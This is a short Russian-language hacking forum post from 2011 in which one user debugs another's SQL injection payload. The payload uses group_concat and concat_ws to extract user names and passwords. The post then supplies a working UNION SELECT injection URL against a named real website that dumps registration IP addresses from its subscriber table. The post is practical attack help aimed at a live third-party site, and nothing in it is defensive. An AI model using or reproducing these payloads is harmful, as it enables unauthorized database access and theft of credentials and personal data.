17.05.2011, 02:39
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от Osstudio
Что не так??
во первых синтаксетическая ошибка:
group_concat(concat_ws( 0x3a3a3a,user_name,pass)+separator+0x0b)
а должно быть:
group_concat(concat_ws( 0x3a,user_name,pass)+separator+0x0b)
во вторых, там таблица пустая!!!
а вообще для примера по твоей уязвимости вот пример вывода:
Сообщение от None
http://www.ecom-info.spb.ru/news/index.php?id=1233+and+1=0+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,group_concat%28concat_ws(0x3a,r eg_ip)+separator+0x0b%29,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35+from+subscri be_emails+limit+0,20--
|
|
|